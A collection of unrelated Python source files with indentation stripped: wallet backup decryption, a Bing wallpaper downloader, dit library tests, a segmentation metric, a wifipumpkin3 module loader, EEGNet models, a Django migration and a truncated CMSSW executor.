"FROM_EMAIL_NAME": os.environ.get("FROM_EMAIL_NAME")
}
|
import base64
import json
from blspy import PublicKeyMPL, SignatureMPL, AugSchemeMPL
from cryptography.fernet import Fernet
from src.util.byte_types import hexstr_to_bytes
from src.util.hash import std_hash
from src.wallet.derive_keys import master_sk_to_backup_sk
from src.wallet.util.wallet_types import WalletType
def open_backup_file(file_path, private_key):
backup_file_text = file_path.read_text()
backup_file_json = json.loads(backup_file_text)
meta_data = backup_file_json["meta_data"]
meta_data_bytes = json.dumps(meta_data).encode()
sig = backup_file_json["signature"]
backup_pk = master_sk_to_backup_sk(private_key)
my_pubkey = backup_pk.get_g1()
key_base_64 = base64.b64encode(bytes(backup_pk))
f = Fernet(key_base_64)
encrypted_data = backup_file_json["data"].encode()
msg = std_hash(encrypted_data) + std_hash(meta_data_bytes)
signature = SignatureMPL.from_bytes(hexstr_to_bytes(sig))
pubkey = PublicKeyMPL.from_bytes(hexstr_to_bytes(meta_data["pubkey"]))
sig_match_my = AugSchemeMPL.verify(my_pubkey, msg, signature)
sig_match_backup = AugSchemeMPL.verify(pubkey, msg, signature)
assert sig_match_my is True
assert sig_match_backup is True
data_bytes = f.decrypt(encrypted_data)
data_text = data_bytes.decode()
data_json = json.loads(data_text)
unencrypted = {}
unencrypted["data"] = data_json
unencrypted["meta_data"] = meta_data
return unencrypted
def get_backup_info(file_path, private_key):
json_dict = open_backup_file(file_path, private_key)
data = json_dict["data"]
wallet_list_json = data["wallet_list"]
info_dict = {}
wallets = []
for wallet_info in wallet_list_json:
wallet = {}
wallet["name"] = wallet_info["name"]
wallet["type"] = wallet_info["type"]
wallet["type_name"] = WalletType(wallet_info["type"]).name
wallet["id"] = wallet_info["id"]
wallet["data"] = wallet_info["data"]
wallets.append(wallet)
info_dict["version"] = data["version"]
info_dict["fingerprint"] = data["fingerprint"]
info_dict["timestamp"] = data["timestamp"]
info_dict["wallets"] = wallets
return info_dict
|
###########################################################################
## ##
## GnomeBingLockScreen ##
## Copyright (C) 2018 张泽平 (Randy Hoffman) ##
## ##
## This program is free software: you can redistribute it and/or modify ##
## it under the terms of the GNU General Public License as published by ##
## the Free Software Foundation, either version 3 of the License, or ##
## (at your option) any later version. ##
## ##
## This program is distributed in the hope that it will be useful, ##
## but WITHOUT ANY WARRANTY; without even the implied warranty of ##
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ##
## GNU General Public License for more details. ##
## ##
## You should have received a copy of the GNU General Public License ##
## along with this program. If not, see http://www.gnu.org/licenses/. ##
## ##
###########################################################################
## Author: 张泽平 (Randy Hoffman) ##
## Website/Contact: https://github.com/zhangzp9970/ ##
###########################################################################
#!/usr/bin/env python3
import json
import os
import urllib.request
import datetime
date=datetime.datetime.now().strftime('%Y-%m-%d')
day_s=datetime.datetime.now()-datetime.timedelta(days = 7)
day=day_s.strftime('%Y-%m-%d')
json_url="https://www.bing.com/HPImageArchive.aspx?format=js&idx=0&n=1&mkt=en-US"
bing_url="https://www.bing.com"
HOME=os.path.expandvars('$HOME')+"/"
json_file=HOME+".bing.json"
directory=HOME+"Pictures/Bing"
picture=directory+"/"+date+".jpg"
picture_del=directory+"/"+day+".jpg"
delete_old_picture = True
if not os.path.exists(directory):
os.makedirs(directory)
if not os.path.exists(picture):
#get the json file and hide the file
urllib.request.urlretrieve(json_url,json_file)
#open the file and import json string
with open(json_file,"rb") as f:
bing_json=json.load(f)
url_append=bing_json['images'][0]['url']
url=bing_url+url_append
#get picture
urllib.request.urlretrieve(url,picture)
#change screen saver
cmd="gsettings set org.gnome.desktop.screensaver picture-uri file:"+picture
os.system(cmd)
if os.path.exists(picture_del):
if delete_old_picture == True:
os.remove(picture_del) |
from __future__ import division
from __future__ import print_function
from nose.tools import assert_almost_equal, assert_equal, assert_raises, \
assert_true
from dit import Distribution, ScalarDistribution
from dit.distribution import BaseDistribution
from dit.exceptions import ditException, InvalidNormalization
def test_dist_iter1():
outcomes = ['00', '01', '10', '11']
pmf = [1/4]*4
d = Distribution(outcomes, pmf)
for o in d:
assert_true(o in outcomes)
for o1, o2 in zip(d, outcomes):
assert_equal(o1, o2)
def test_dist_iter2():
outcomes = ['00', '01', '10', '11']
pmf = [1/4]*4
d = Distribution(outcomes, pmf)
for o in reversed(d):
assert_true(o in outcomes)
for o1, o2 in zip(reversed(d), reversed(outcomes)):
assert_equal(o1, o2)
def test_numerical():
outcomes = ['00', '01', '10', '11']
pmf = [1/4]*4
d = Distribution(outcomes, pmf)
assert_true(d.is_numerical())
def test_rand():
outcomes = ['00', '01', '10', '11']
pmf = [1/4]*4
d = Distribution(outcomes, pmf)
for _ in range(10):
yield assert_true, d.rand() in outcomes
def test_to_dict():
outcomes = ['00', '01', '10', '11']
pmf = [1/4]*4
d = Distribution(outcomes, pmf)
dd = d.to_dict()
for o, p in dd.items():
yield assert_almost_equal, d[o], p
def test_validate1():
outcomes = ['00', '01', '10', '11']
pmf = [1/4]*4
d = Distribution(outcomes, pmf)
assert_true(d.validate())
assert_true(BaseDistribution.validate(d))
def test_validate2():
outcomes = ['00', '01', '10', '11']
pmf = [1/4]*4
d = Distribution(outcomes, pmf)
d['00'] = 0
assert_raises(InvalidNormalization, d.validate)
assert_raises(InvalidNormalization, BaseDistribution.validate, d)
def test_zipped1():
outcomes = ['00', '01', '10', '11']
pmf = [1/4]*4
d = Distribution(outcomes, pmf)
zipped = d.zipped(mode='pants')
assert_raises(ditException, list, zipped)
def test_to_string1():
# Basic
outcomes = ['00', '01', '10', '11']
pmf = [1/4]*4
d = Distribution(outcomes, pmf)
s = d.to_string()
s_ = """Class: Distribution
Alphabet: ('0', '1') for all rvs
Base: linear
Outcome Class: str
Outcome Length: 2
RV Names: None
x p(x)
00 0.25
01 0.25
10 0.25
11 0.25"""
assert_equal(s, s_)
def test_to_string2():
# Test with exact.
outcomes = ['00', '01', '10', '11']
pmf = [1/4]*4
d = Distribution(outcomes, pmf)
s = d.to_string(exact=True)
s_ = """Class: Distribution
Alphabet: ('0', '1') for all rvs
Base: linear
Outcome Class: str
Outcome Length: 2
RV Names: None
x p(x)
00 1/4
01 1/4
10 1/4
11 1/4"""
assert_equal(s, s_)
def test_to_string3():
# Test printing
outcomes = ['00', '01', '10', '11']
pmf = [1/4]*4
d = Distribution(outcomes, pmf)
s_ = """Class: Distribution
Alphabet: ('0', '1') for all rvs
Base: linear
Outcome Class: str
Outcome Length: 2
RV Names: None
x p(x)
00 0.25
01 0.25
10 0.25
11 0.25"""
# context manager?
import sys
from six import StringIO
sio = StringIO()
try:
old = sys.stdout
sys.stdout = sio
print(d, end='')
finally:
sys.stdout = old
sio.seek(0)
s = sio.read()
assert_equal(s, s_)
def test_to_string4():
# Basic with marginal
outcomes = ['00', '01', '10', '11']
pmf = [1/4]*4
d = Distribution(outcomes, pmf)
d = d.marginal([0])
s = d.to_string()
s_ = """Class: Distribution
Alphabet: ('0', '1') for all rvs
Base: linear
Outcome Class: str
Outcome Length: 1
RV Names: None
x p(x)
0 0.5
1 0.5"""
assert_equal(s, s_)
def test_to_string5():
# Basic with marginal and mask
outcomes = ['00', '01', '10', '11']
pmf = [1/4]*4
d = Distribution(outcomes, pmf)
d = d.marginal([0])
s = d.to_string(show_mask=True)
s_ = """Class: Distribution
Alphabet: ('0', '1') for all rvs
Base: linear
Outcome Class: str
Outcome Length: 1 (mask: 2)
RV Names: None
x p(x)
0* 0.5
1* 0.5"""
assert_equal(s, s_)
def test_to_string6():
# Basic
outcomes = ['00', '01', '10', '11']
pmf = [1/4]*4
d = Distribution(outcomes, pmf)
s = d.to_string(digits=1)
s_ = """Class: Distribution
Alphabet: ('0', '1') for all rvs
Base: linear
Outcome Class: str
Outcome Length: 2
RV Names: None
x p(x)
00 0.2
01 0.2
10 0.2
11 0.2"""
assert_equal(s, s_)
def test_to_string7():
# Basic
outcomes = ['00', '01', '10', '11']
pmf = [1/4]*4
d = ScalarDistribution(outcomes, pmf)
s = d.to_string()
s_ = """Class: ScalarDistribution
Alphabet: ('00', '01', '10', '11')
Base: linear
x p(x)
00 0.25
01 0.25
10 0.25
11 0.25"""
assert_equal(s, s_)
def test_to_string8():
outcomes = ['00', '01', '10', '11']
pmf = [1/4]*4
d = Distribution(outcomes, pmf)
d = d.marginal([0])
s = d.to_string(show_mask='!')
s_ = """Class: Distribution
Alphabet: ('0', '1') for all rvs
Base: linear
Outcome Class: str
Outcome Length: 1 (mask: 2)
RV Names: None
x p(x)
0! 0.5
1! 0.5"""
assert_equal(s, s_)
def test_to_string9():
# Basic
outcomes = ['00', '01', '10', '11']
pmf = [1/4]*4
d = Distribution(outcomes, pmf)
d.set_base(2)
s = d.to_string()
s_ = """Class: Distribution
Alphabet: ('0', '1') for all rvs
Base: 2
Outcome Class: str
Outcome Length: 2
RV Names: None
x log p(x)
00 -2.0
01 -2.0
10 -2.0
11 -2.0"""
assert_equal(s, s_)
def test_to_string10():
# Basic
d = ScalarDistribution([], sample_space=[0, 1], validate=False)
s = d.to_string()
s_ = """Class: ScalarDistribution
Alphabet: (0, 1)
Base: 2
x log p(x)"""
assert_equal(s, s_)
def test_prepare_string1():
# Basic
outcomes = ['00', '01', '10', '11']
pmf = [1/4]*4
d = ScalarDistribution(outcomes, pmf)
from dit.distribution import prepare_string
assert_raises(ditException, prepare_string, d, show_mask=True)
def test_prepare_string2():
# Basic
outcomes = ['00', '01', '10', '11']
pmf = [1/4]*4
d = ScalarDistribution(outcomes, pmf)
from dit.distribution import prepare_string
assert_raises(ditException, prepare_string, d, str_outcomes=True)
def test_prepare_string3():
outcomes = [(0, 0), (0, 1), (1, 0), (1, 1)]
pmf = [1/4]*4
d = Distribution(outcomes, pmf)
s_ = """Class: Distribution
Alphabet: (0, 1) for all rvs
Base: linear
Outcome Class: tuple
Outcome Length: 2
RV Names: None
x p(x)
00 0.25
01 0.25
10 0.25
11 0.25"""
s = d.to_string(str_outcomes=True)
assert_equal(s, s_)
def test_prepare_string4():
class WeirdInt(int):
def __str__(self):
raise Exception
outcomes = [(0, 0), (0, 1), (1, 0), (1, 1)]
outcomes = [(WeirdInt(x), WeirdInt(y)) for (x, y) in outcomes]
pmf = [1/4]*4
d = Distribution(outcomes, pmf)
s_ = """Class: Distribution
Alphabet: (0, 1) for all rvs
Base: linear
Outcome Class: tuple
Outcome Length: 2
RV Names: None
x p(x)
(0, 0) 0.25
(0, 1) 0.25
(1, 0) 0.25
(1, 1) 0.25"""
s = d.to_string(str_outcomes=True)
assert_equal(s, s_)
def test_really_big_words():
"""
Test to ensure that large but sparse outcomes are fast.
"""
outcomes = ['01'*45, '10'*45]
pmf = [1/2]*2
d = Distribution(outcomes, pmf)
d = d.coalesce([range(30), range(30, 60), range(60, 90)])
new_outcomes = (('10'*15,)*3, ('01'*15,)*3)
assert_equal(d.outcomes, new_outcomes)
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Semantic segmentation metric."""
import gin
import gin.tf
import numpy as np
import tensorflow as tf
from tf3d import standard_fields
from object_detection.utils import label_map_util
@gin.configurable
class SemanticSegmentationMetric(tf.keras.metrics.Metric):
"""Semantic segmentation mean intersection over union metric."""
def __init__(self,
multi_label=False,
num_classes=None,
label_map=None,
label_map_path=None,
eval_prefix='eval',
name='semantic_segmentation_metric'):
"""Semantic segmentation mean intersection over union metric.
Args:
multi_label: Boolean which denotes if pixels can be assigned multiple
labels; classes are treated separately, logit > 0 is positive
prediction.
num_classes: Number of classes.
label_map: A dictionary mapping label ids to label names.
label_map_path: path to labelmap (could be None).
eval_prefix: Prefix for eval name; separates scalar values in Tensorboard.
name: class name.
"""
super(SemanticSegmentationMetric, self).__init__(name=name)
self.multi_label = multi_label
self.num_classes = num_classes
if label_map:
self.label_map = label_map
elif label_map_path:
self.label_map = _get_label_map(label_map_path)
else:
self.label_map = None
self.eval_prefix = eval_prefix
if self.label_map is not None:
self.class_range = self.label_map.keys()
elif num_classes is not None:
self.class_range = range(num_classes)
else:
raise ValueError('Both num_classes and label_map are None.')
self.true_positive_metrics = {}
self.false_positive_metrics = {}
self.false_negative_metrics = {}
for c in self.class_range:
self.true_positive_metrics[c] = tf.keras.metrics.TruePositives(
name=('%s_true_positive_%d' % (name, c)))
self.false_positive_metrics[c] = tf.keras.metrics.FalsePositives(
name=('%s_false_positive_%d' % (name, c)))
self.false_negative_metrics[c] = tf.keras.metrics.FalseNegatives(
name=('%s_false_negative_%d' % (name, c)))
def update_state(self, inputs, outputs):
"""Function that updates the metric state at each example.
Args:
inputs: A dictionary containing input tensors.
outputs: A dictionary containing output tensors.
Returns:
Update op.
"""
# Prepare logits and labels
logits = outputs[
standard_fields.DetectionResultFields.object_semantic_points]
labels = inputs[standard_fields.InputDataFields.object_class_points]
weights = inputs[standard_fields.InputDataFields.point_loss_weights]
num_valid_points = inputs[standard_fields.InputDataFields.num_valid_points]
if len(logits.get_shape().as_list()) == 3:
batch_size = logits.get_shape().as_list()[0]
logits_list = []
labels_list = []
weights_list = []
for i in range(batch_size):
num_valid_points_i = num_valid_points[i]
logits_list.append(logits[i, 0:num_valid_points_i, :])
labels_list.append(labels[i, 0:num_valid_points_i, :])
weights_list.append(weights[i, 0:num_valid_points_i, :])
logits = tf.concat(logits_list, axis=0)
labels = tf.concat(labels_list, axis=0)
weights = tf.concat(weights_list, axis=0)
if self.num_classes is None:
num_classes = logits.get_shape().as_list()[-1]
else:
num_classes = self.num_classes
if num_classes != logits.get_shape().as_list()[-1]:
raise ValueError('num_classes do not match the logits dimensions.')
class_labels, class_predictions = _get_class_labels_and_predictions(
labels=labels,
logits=logits,
num_classes=self.num_classes,
multi_label=self.multi_label)
update_ops = []
for c in self.class_range:
update_op_tp_c = self.true_positive_metrics[c].update_state(
y_true=class_labels[c],
y_pred=class_predictions[c],
sample_weight=weights)
update_ops.append(update_op_tp_c)
update_op_fp_c = self.false_positive_metrics[c].update_state(
y_true=class_labels[c],
y_pred=class_predictions[c],
sample_weight=weights)
update_ops.append(update_op_fp_c)
update_op_fn_c = self.false_negative_metrics[c].update_state(
y_true=class_labels[c],
y_pred=class_predictions[c],
sample_weight=weights)
update_ops.append(update_op_fn_c)
return tf.group(update_ops)
def result(self):
metrics_dict = self.get_metric_dictionary()
return metrics_dict[self.eval_prefix + '_avg/mean_iou']
def get_metric_dictionary(self):
metrics_dict = {}
class_recall_list = [] # used for calculating mean pixel accuracy.
class_iou_list = [] # used for calculating mean iou.
for c in self.class_range:
tp = self.true_positive_metrics[c].result()
fp = self.false_positive_metrics[c].result()
fn = self.false_negative_metrics[c].result()
class_recall = tp / (tp + fn)
class_precision = tf.where(
tf.greater(tp + fn, 0.0), _safe_div(tp, (tp + fp)),
tf.constant(np.NaN))
class_iou = tf.where(
tf.greater(tp + fn, 0.0), tp / (tp + fn + fp), tf.constant(np.NaN))
class_recall_list.append(class_recall)
class_iou_list.append(class_iou)
class_name = _get_class_name(class_id=c, label_map=self.label_map)
metrics_dict[self.eval_prefix +
'_recall/{}'.format(class_name)] = class_recall
metrics_dict[self.eval_prefix +
'_precision/{}'.format(class_name)] = class_precision
metrics_dict[self.eval_prefix + '_iou/{}'.format(class_name)] = class_iou
mean_pixel_accuracy = _non_nan_mean(class_recall_list)
mean_iou = _non_nan_mean(class_iou_list)
metrics_dict[self.eval_prefix +
'_avg/mean_pixel_accuracy'] = mean_pixel_accuracy
metrics_dict[self.eval_prefix + '_avg/mean_iou'] = mean_iou
return metrics_dict
def reset_states(self):
for _, value in self.true_positive_metrics.items():
value.reset_states()
for _, value in self.false_positive_metrics.items():
value.reset_states()
for _, value in self.false_negative_metrics.items():
value.reset_states()
def _get_class_labels_and_predictions(labels, logits, num_classes, multi_label):
"""Returns list of per-class-labels and list of per-class-predictions.
Args:
labels: A `Tensor` of size [n, k]. In the
multi-label case, values are either 0 or 1 and k = num_classes. Otherwise,
k = 1 and values are in [0, num_classes).
logits: A `Tensor` of size [n, `num_classes`]
representing the logits of each pixel and semantic class.
num_classes: Number of classes.
multi_label: Boolean which defines if we are in a multi_label setting, where
pixels can have multiple labels, or not.
Returns:
class_labels: List of size num_classes, where each entry is a `Tensor' of
size [batch_size, height, width] of type float with values of 0 or 1
representing the ground truth labels.
class_predictions: List of size num_classes, each entry is a `Tensor' of
size [batch_size, height, width] of type float with values of 0 or 1
representing the predicted labels.
"""
class_predictions = [None] * num_classes
if multi_label:
class_labels = tf.split(labels, num_or_size_splits=num_classes, axis=1)
class_logits = tf.split(logits, num_or_size_splits=num_classes, axis=1)
for c in range(num_classes):
class_predictions[c] = tf.cast(
tf.greater(class_logits[c], 0), dtype=tf.float32)
else:
class_predictions_flat = tf.argmax(logits, 1)
class_labels = [None] * num_classes
for c in range(num_classes):
class_labels[c] = tf.cast(tf.equal(labels, c), dtype=tf.float32)
class_predictions[c] = tf.cast(
tf.equal(class_predictions_flat, c), dtype=tf.float32)
return class_labels, class_predictions
def _get_class_name(class_id, label_map):
"""Gets class name from label dictionary."""
if label_map and class_id in label_map:
return label_map[class_id]
else:
return str(class_id)
def _non_nan_mean(tensor_list):
"""Calculates the mean of a list of tensors while ignoring nans."""
tensor = tf.stack(tensor_list)
not_nan = tf.logical_not(tf.math.is_nan(tensor))
return tf.reduce_mean(tf.boolean_mask(tensor, not_nan))
def _safe_div(a, b):
"""Divides two numbers, returns 0 if denominator is (close to) 0."""
return tf.where(tf.less(tf.abs(b), 1e-10), 0.0, a / b)
def _get_label_map(label_map_path):
"""Returns dictionary mapping label IDs to class-names."""
if not label_map_path:
return None
label_map_proto = label_map_util.load_labelmap(label_map_path)
label_map = {}
for item in label_map_proto.item:
if item.HasField('display_name'):
label_map[item.id] = item.display_name
elif item.HasField('name'):
label_map[item.id] = item.name
return label_map
|
import os
import pkgutil
import sys
import importlib
import re
from wifipumpkin3.core.utility.printer import display_messages
# https://stackoverflow.com/questions/3365740/how-to-import-all-submodules
def import_submodules(package, recursive=True):
""" Import all submodules of a module, recursively, including subpackages
:param package: package (name or actual module)
:type package: str | module
:rtype: dict[str, types.ModuleType]
"""
if isinstance(package, str):
package = importlib.import_module(package)
results = {}
parser = re.compile(r"(\s*)wifipumpkin3.modules.(\s*)")
for loader, name, is_pkg in pkgutil.walk_packages(package.__path__):
full_name = package.__name__ + "." + name
short_name = "{}.{}".format(parser.sub("", package.__name__), name)
results[short_name] = importlib.import_module(full_name)
if recursive and is_pkg:
results.update(import_submodules(full_name))
return results
def all_modules():
modules = import_submodules(__name__)
for module in modules:
try:
# print(module)
if not (os.path.isdir(module.replace(".", "/"))):
current_module = modules[module].ModPump()
except AttributeError:
print(
display_messages(
"Module {} not has `ModPump` class!".format(module), error=True
)
)
def module_list():
return import_submodules(__name__)
|
'''
Created on 28 de abr de 2020
@author: leonardo
Content: Classe do PoweUp de Velocidade
'''
from componentes.jogo.powerups import PowerUp
class Velocidade(PowerUp):
def poder(self, personagem):
pass
#personagem.velocidade += 1
#personagem.servidor.emitPoder("velocidade", personagem.velocidade-1, personagem.sid)
|
# Authors: Robin Schirrmeister <robintibor@gmail.com>
#
# License: BSD (3-clause)
import torch
from torch import nn
from torch.nn.functional import elu
from .modules import Expression, Ensure4d
from .functions import squeeze_final_output
class Conv2dWithConstraint(nn.Conv2d):
def __init__(self, *args, max_norm=1, **kwargs):
self.max_norm = max_norm
super(Conv2dWithConstraint, self).__init__(*args, **kwargs)
def forward(self, x):
self.weight.data = torch.renorm(
self.weight.data, p=2, dim=0, maxnorm=self.max_norm
)
return super(Conv2dWithConstraint, self).forward(x)
class EEGNetv4(nn.Sequential):
"""EEGNet v4 model from Lawhern et al 2018.
See details in [EEGNet4]_.
Parameters
----------
in_chans : int
XXX
Notes
-----
This implementation is not guaranteed to be correct, has not been checked
by original authors, only reimplemented from the paper description.
References
----------
.. [EEGNet4] Lawhern, V. J., Solon, A. J., Waytowich, N. R., Gordon,
S. M., Hung, C. P., & Lance, B. J. (2018).
EEGNet: A Compact Convolutional Network for EEG-based
Brain-Computer Interfaces.
arXiv preprint arXiv:1611.08024.
"""
def __init__(
self,
in_chans,
n_classes,
input_window_samples=None,
final_conv_length="auto",
pool_mode="mean",
F1=8,
D=2,
F2=16, # usually set to F1*D (?)
kernel_length=64,
third_kernel_size=(8, 4),
drop_prob=0.25,
):
super().__init__()
if final_conv_length == "auto":
assert input_window_samples is not None
self.in_chans = in_chans
self.n_classes = n_classes
self.input_window_samples = input_window_samples
self.final_conv_length = final_conv_length
self.pool_mode = pool_mode
self.F1 = F1
self.D = D
self.F2 = F2
self.kernel_length = kernel_length
self.third_kernel_size = third_kernel_size
self.drop_prob = drop_prob
pool_class = dict(max=nn.MaxPool2d, mean=nn.AvgPool2d)[self.pool_mode]
self.add_module("ensuredims", Ensure4d())
# b c 0 1
# now to b 1 0 c
self.add_module("dimshuffle", Expression(_transpose_to_b_1_c_0))
self.add_module(
"conv_temporal",
nn.Conv2d(
1,
self.F1,
(1, self.kernel_length),
stride=1,
bias=False,
padding=(0, self.kernel_length // 2),
),
)
self.add_module(
"bnorm_temporal",
nn.BatchNorm2d(self.F1, momentum=0.01, affine=True, eps=1e-3),
)
self.add_module(
"conv_spatial",
Conv2dWithConstraint(
self.F1,
self.F1 * self.D,
(self.in_chans, 1),
max_norm=1,
stride=1,
bias=False,
groups=self.F1,
padding=(0, 0),
),
)
self.add_module(
"bnorm_1",
nn.BatchNorm2d(
self.F1 * self.D, momentum=0.01, affine=True, eps=1e-3
),
)
self.add_module("elu_1", Expression(elu))
self.add_module("pool_1", pool_class(kernel_size=(1, 4), stride=(1, 4)))
self.add_module("drop_1", nn.Dropout(p=self.drop_prob))
# https://discuss.pytorch.org/t/how-to-modify-a-conv2d-to-depthwise-separable-convolution/15843/7
self.add_module(
"conv_separable_depth",
nn.Conv2d(
self.F1 * self.D,
self.F1 * self.D,
(1, 16),
stride=1,
bias=False,
groups=self.F1 * self.D,
padding=(0, 16 // 2),
),
)
self.add_module(
"conv_separable_point",
nn.Conv2d(
self.F1 * self.D,
self.F2,
(1, 1),
stride=1,
bias=False,
padding=(0, 0),
),
)
self.add_module(
"bnorm_2",
nn.BatchNorm2d(self.F2, momentum=0.01, affine=True, eps=1e-3),
)
self.add_module("elu_2", Expression(elu))
self.add_module("pool_2", pool_class(kernel_size=(1, 8), stride=(1, 8)))
self.add_module("drop_2", nn.Dropout(p=self.drop_prob))
out = self(
torch.ones(
(1, self.in_chans, self.input_window_samples, 1),
dtype=torch.float32
)
)
n_out_virtual_chans = out.cpu().data.numpy().shape[2]
if self.final_conv_length == "auto":
n_out_time = out.cpu().data.numpy().shape[3]
self.final_conv_length = n_out_time
self.add_module(
"conv_classifier",
nn.Conv2d(
self.F2,
self.n_classes,
(n_out_virtual_chans, self.final_conv_length),
bias=True,
),
)
self.add_module("softmax", nn.LogSoftmax(dim=1))
# Transpose back to the the logic of braindecode,
# so time in third dimension (axis=2)
self.add_module("permute_back", Expression(_transpose_1_0))
self.add_module("squeeze", Expression(squeeze_final_output))
_glorot_weight_zero_bias(self)
def _transpose_to_b_1_c_0(x):
return x.permute(0, 3, 1, 2)
def _transpose_1_0(x):
return x.permute(0, 1, 3, 2)
class EEGNetv1(nn.Sequential):
"""EEGNet model from Lawhern et al. 2016.
See details in [EEGNet]_.
Parameters
----------
in_chans : int
XXX
Notes
-----
This implementation is not guaranteed to be correct, has not been checked
by original authors, only reimplemented from the paper description.
References
----------
.. [EEGNet] Lawhern, V. J., Solon, A. J., Waytowich, N. R., Gordon,
S. M., Hung, C. P., & Lance, B. J. (2016).
EEGNet: A Compact Convolutional Network for EEG-based
Brain-Computer Interfaces.
arXiv preprint arXiv:1611.08024.
"""
def __init__(
self,
in_chans,
n_classes,
input_window_samples=None,
final_conv_length="auto",
pool_mode="max",
second_kernel_size=(2, 32),
third_kernel_size=(8, 4),
drop_prob=0.25,
):
super().__init__()
if final_conv_length == "auto":
assert input_window_samples is not None
self.in_chans = in_chans
self.n_classes = n_classes
self.input_window_samples = input_window_samples
self.final_conv_length = final_conv_length
self.pool_mode = pool_mode
self.second_kernel_size = second_kernel_size
self.third_kernel_size = third_kernel_size
self.drop_prob = drop_prob
pool_class = dict(max=nn.MaxPool2d, mean=nn.AvgPool2d)[self.pool_mode]
self.add_module("ensuredims", Ensure4d())
n_filters_1 = 16
self.add_module(
"conv_1",
nn.Conv2d(self.in_chans, n_filters_1, (1, 1), stride=1, bias=True),
)
self.add_module(
"bnorm_1",
nn.BatchNorm2d(n_filters_1, momentum=0.01, affine=True, eps=1e-3),
)
self.add_module("elu_1", Expression(elu))
# transpose to examples x 1 x (virtual, not EEG) channels x time
self.add_module(
"permute_1", Expression(lambda x: x.permute(0, 3, 1, 2))
)
self.add_module("drop_1", nn.Dropout(p=self.drop_prob))
n_filters_2 = 4
# keras padds unequal padding more in front, so padding
# too large should be ok.
# Not padding in time so that cropped training makes sense
# https://stackoverflow.com/questions/43994604/padding-with-even-kernel-size-in-a-convolutional-layer-in-keras-theano
self.add_module(
"conv_2",
nn.Conv2d(
1,
n_filters_2,
self.second_kernel_size,
stride=1,
padding=(self.second_kernel_size[0] // 2, 0),
bias=True,
),
)
self.add_module(
"bnorm_2",
nn.BatchNorm2d(n_filters_2, momentum=0.01, affine=True, eps=1e-3),
)
self.add_module("elu_2", Expression(elu))
self.add_module("pool_2", pool_class(kernel_size=(2, 4), stride=(2, 4)))
self.add_module("drop_2", nn.Dropout(p=self.drop_prob))
n_filters_3 = 4
self.add_module(
"conv_3",
nn.Conv2d(
n_filters_2,
n_filters_3,
self.third_kernel_size,
stride=1,
padding=(self.third_kernel_size[0] // 2, 0),
bias=True,
),
)
self.add_module(
"bnorm_3",
nn.BatchNorm2d(n_filters_3, momentum=0.01, affine=True, eps=1e-3),
)
self.add_module("elu_3", Expression(elu))
self.add_module("pool_3", pool_class(kernel_size=(2, 4), stride=(2, 4)))
self.add_module("drop_3", nn.Dropout(p=self.drop_prob))
out = self(
torch.ones(
(1, self.in_chans, self.input_window_samples, 1),
dtype=torch.float32,
)
)
n_out_virtual_chans = out.cpu().data.numpy().shape[2]
if self.final_conv_length == "auto":
n_out_time = out.cpu().data.numpy().shape[3]
self.final_conv_length = n_out_time
self.add_module(
"conv_classifier",
nn.Conv2d(
n_filters_3,
self.n_classes,
(n_out_virtual_chans, self.final_conv_length),
bias=True,
),
)
self.add_module("softmax", nn.LogSoftmax(dim=1))
# Transpose back to the the logic of braindecode,
# so time in third dimension (axis=2)
self.add_module(
"permute_2", Expression(lambda x: x.permute(0, 1, 3, 2))
)
self.add_module("squeeze", Expression(squeeze_final_output))
_glorot_weight_zero_bias(self)
def _glorot_weight_zero_bias(model):
"""Initalize parameters of all modules by initializing weights with
glorot
uniform/xavier initialization, and setting biases to zero. Weights from
batch norm layers are set to 1.
Parameters
----------
model: Module
"""
for module in model.modules():
if hasattr(module, "weight"):
if not ("BatchNorm" in module.__class__.__name__):
nn.init.xavier_uniform_(module.weight, gain=1)
else:
nn.init.constant_(module.weight, 1)
if hasattr(module, "bias"):
if module.bias is not None:
nn.init.constant_(module.bias, 0)
|
from vit.formatter.wait import Wait
class WaitAge(Wait):
def format(self, wait, task):
return self.age(wait)
|
# Generated by Django 2.2.8 on 2020-01-16 09:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0023_auto_20200108_1446'),
]
operations = [
migrations.AlterField(
model_name='apartmentsensorvalue',
name='value',
field=models.DecimalField(decimal_places=1, max_digits=8),
),
]
|
#!/usr/bin/env python
"""
_Step.Executor.CMSSW_
Implementation of an Executor for a CMSSW step.
"""
import logging
import os
import socket
import subprocess
import sys
from Utils.PythonVersion import PY3
from Utils.Utilities import encodeUnicodeToBytesConditional
from WMCore.FwkJobReport.Report import addAttributesToFile
from WMCore.WMExceptions import WM_JOB_ERROR_CODES
from WMCore.WMRuntime.Tools.Scram import Scram
from WMCore.WMRuntime.Tools.Scram import getSingleScramArch
from WMCore.WMSpec.Steps.Executor import Executor
from WMCore.WMSpec.Steps.WMExecutionFailure import WMExecutionFailure
from WMCore.WMSpec.WMStep import WMStepHelper
def analysisFileLFN(fileName, lfnBase, job):
"""
Construct an LFN for a user file
"""
base = os.path.split(fileName)[1]
root, ext = os.path.splitext(base)
newBase = '{base}_{count:04d}{ext}'.format(base=root, ext=ext, count=job['counter'])
lfn = os.path.join(lfnBase, job['workflow'], 'output', newBase)
return lfn
class CMSSW(Executor):
"""
_CMSWW_
Execute a CMSSW Step
"""
def __init__(self):
super(CMSSW, self).__init__()
self.failedPreviousStep = None
def _setStatus(self, returnCode, returnMessage):
"""
Set return code.
"""
self.setCondorChirpAttrDelayed('Chirp_WMCore_cmsRun_ExitCode', returnCode)
self.setCondorChirpAttrDelayed('Chirp_WMCore_%s_ExitCode' % self.stepName, returnCode)
if returnMessage and returnCode != 0:
self.setCondorChirpAttrDelayed('Chirp_WMCore_cmsRun_Exception_Message', returnMessage, compress=True)
self.setCondorChirpAttrDelayed('Chirp_WMCore_%s_Exception_Message' % self.stepName, returnMessage, compress=True)
self.step.execution.exitStatus = returnCode
def pre(self, emulator=None):
"""
_pre_
Pre execution checks
"""
if emulator is not None:
return emulator.emulatePre(self.step)
logging.info("Steps.Executors.%s.pre called", self.__class__.__name__)
if hasattr(self.step.application.configuration, 'configCacheUrl'):
# means we have a configuration & tweak in the sandbox
psetFile = self.step.application.command.configuration
